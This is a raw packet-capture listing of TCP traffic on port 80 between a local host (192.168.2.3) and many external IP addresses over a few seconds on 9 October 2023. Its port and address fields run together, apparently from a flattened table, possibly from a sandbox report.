                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481781960 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481801987 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481841087 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481838942 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481875896 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481882095 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481884956 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481895924 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481906891 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481920958 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481945038 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481964111 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481978893 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.481990099 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.482002974 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.482032061 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.482040882 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.482074976 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.487885952 CEST8049790192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.487936020 CEST4979080192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.491420984 CEST804979634.149.87.45192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.491501093 CEST4979680192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.522378922 CEST804978880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.522448063 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.524900913 CEST4979680192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.559333086 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.577239037 CEST4979880192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.577475071 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.597855091 CEST804978754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.616378069 CEST804979754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.616528988 CEST4979780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.616933107 CEST4979780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.641057014 CEST4980080192.168.2.396.91.204.114
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.696943998 CEST804979634.149.87.45192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719480038 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719527006 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719558954 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719579935 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719614983 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719636917 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719676018 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719697952 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719710112 CEST8049794118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719734907 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.719755888 CEST4979480192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.727524996 CEST804979134.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.740010977 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.740081072 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.748220921 CEST804979634.149.87.45192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.748279095 CEST4979680192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.753338099 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.768085003 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.768129110 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.768151999 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.768193007 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.846661091 CEST804979754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.846713066 CEST804979754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.846721888 CEST4979780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.846751928 CEST4979780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.849009991 CEST4979780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.867331982 CEST804978880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.867404938 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.869050980 CEST4980180192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.903136015 CEST4978680192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.907629967 CEST8049798170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.907744884 CEST4979880192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.915901899 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.925889969 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.925910950 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.925935030 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.925997019 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.925997019 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.925997972 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.926037073 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.926042080 CEST8049799104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.926079035 CEST4979980192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.940298080 CEST4979880192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.940778017 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.026523113 CEST4980380192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.029665947 CEST4980480192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.031219959 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.031797886 CEST8049801104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.031913042 CEST4980180192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.032207012 CEST4980180192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.078049898 CEST804979754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.080564976 CEST4980680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.193401098 CEST8049756195.78.66.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.193526983 CEST4975680192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.193909883 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.194027901 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.194454908 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.194750071 CEST8049801104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.256644011 CEST80498033.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.256920099 CEST4980380192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.257323027 CEST4980380192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.270004034 CEST8049798170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.270499945 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.270601034 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.270863056 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.356967926 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.422372103 CEST804980689.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.422518015 CEST4980680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.423541069 CEST4980680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.486712933 CEST80498033.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.486731052 CEST80498033.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.486838102 CEST4980380192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.487704039 CEST4980380192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.509363890 CEST4980780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.550862074 CEST8049798170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.550945044 CEST4979880192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.566804886 CEST8049801104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.566821098 CEST8049801104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.566832066 CEST8049801104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.566895008 CEST4980180192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.566930056 CEST4980180192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.589791059 CEST4979880192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.600431919 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.601675987 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.601746082 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.627697945 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.638029099 CEST4980880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.653280020 CEST4980080192.168.2.396.91.204.114
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.717077971 CEST80498033.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.740338087 CEST80498073.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.740508080 CEST4980780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.741216898 CEST4980780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.765191078 CEST804980689.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.765595913 CEST804980689.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.765654087 CEST4980680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.765660048 CEST804980689.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.765701056 CEST4980680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.807900906 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.878770113 CEST8049808192.252.154.18192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.878953934 CEST4980880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.879621029 CEST4980880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.919586897 CEST8049798170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.956204891 CEST8049741170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.956291914 CEST4974180192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.958365917 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.958460093 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.971309900 CEST80498073.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.971362114 CEST80498073.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.971386909 CEST4980780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.971415997 CEST4980780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.975809097 CEST4981080192.168.2.313.33.21.96
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.983670950 CEST4980780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.043814898 CEST4980480192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.063179016 CEST8049798170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.063389063 CEST4979880192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.063663960 CEST4981180192.168.2.380.74.154.6
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.083067894 CEST804980960.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.083288908 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.099478960 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.100296021 CEST4981280192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.113657951 CEST4981380192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.119689941 CEST8049808192.252.154.18192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.122351885 CEST8049808192.252.154.18192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.122427940 CEST4980880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.138540983 CEST804981013.33.21.96192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.138658047 CEST4981080192.168.2.313.33.21.96
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.138928890 CEST4981080192.168.2.313.33.21.96
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.164295912 CEST804975891.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.164391041 CEST4975880192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.169095993 CEST4981480192.168.2.3193.166.255.171
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.213365078 CEST80498073.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.301776886 CEST804981013.33.21.96192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.302122116 CEST804981013.33.21.96192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.302362919 CEST4981080192.168.2.313.33.21.96
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.322207928 CEST4981080192.168.2.313.33.21.96
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.374545097 CEST804980960.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.375443935 CEST804980960.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.375569105 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.384411097 CEST804981180.74.154.6192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.384547949 CEST4981180192.168.2.380.74.154.6
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.408751965 CEST4981180192.168.2.380.74.154.6
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.409688950 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.428563118 CEST804981391.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.428699017 CEST4981380192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.428971052 CEST4981380192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.429069996 CEST8049812185.80.51.179192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.429143906 CEST4981280192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.429328918 CEST4981280192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.485737085 CEST804981013.33.21.96192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.485901117 CEST4981080192.168.2.313.33.21.96
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.642386913 CEST8049773162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.642548084 CEST4977380192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.685446978 CEST804980960.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.685570955 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.729552984 CEST804981180.74.154.6192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.729577065 CEST804981180.74.154.6192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.729672909 CEST4981180192.168.2.380.74.154.6
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.743669033 CEST804981391.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.744054079 CEST804981391.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.744117975 CEST4981380192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.758104086 CEST8049812185.80.51.179192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.759812117 CEST8049812185.80.51.179192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.759891987 CEST4981280192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.787615061 CEST4981180192.168.2.380.74.154.6
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.868124962 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.874114037 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.877305984 CEST4981780192.168.2.346.242.238.60
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.903178930 CEST4978680192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.918627024 CEST4981880192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.108782053 CEST804981180.74.154.6192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.108854055 CEST4981180192.168.2.380.74.154.6
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.150362015 CEST4981980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.184390068 CEST4981480192.168.2.3193.166.255.171
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.185403109 CEST8049818211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.185491085 CEST4981880192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.185771942 CEST4981880192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.205809116 CEST804981681.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.206020117 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.206516981 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.206595898 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.206648111 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.207679033 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.219065905 CEST804981746.242.238.60192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.219176054 CEST4981780192.168.2.346.242.238.60
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.219777107 CEST4981780192.168.2.346.242.238.60
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351536036 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351564884 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351579905 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351593018 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351608992 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351620913 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351634979 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351648092 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351659060 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351672888 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351671934 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351685047 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351700068 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351767063 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351767063 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.351767063 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352288008 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352346897 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352348089 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352360010 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352372885 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352390051 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.352420092 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.353241920 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.353310108 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.353323936 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.353338003 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.353389978 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.353419065 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.354127884 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.354161024 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.354173899 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.354186058 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.354259968 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.354286909 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355047941 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355063915 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355113983 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355165958 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355186939 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355216980 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.355994940 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356008053 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356038094 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356051922 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356123924 CEST4980580192.168.2.3104.26.15.53
